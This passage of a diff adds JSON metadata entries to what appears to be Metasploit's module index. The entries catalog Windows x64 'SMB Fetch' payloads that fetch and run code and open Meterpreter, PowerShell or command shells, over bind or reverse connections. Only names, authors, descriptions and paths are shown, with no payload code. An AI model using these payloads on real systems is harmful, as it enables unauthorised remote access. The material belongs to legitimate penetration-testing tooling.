Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_http": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_https": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/peinject/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": { + "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/pingback_reverse_tcp": { + "name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_bind_tcp": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_reverse_tcp": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/shell/bind_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": 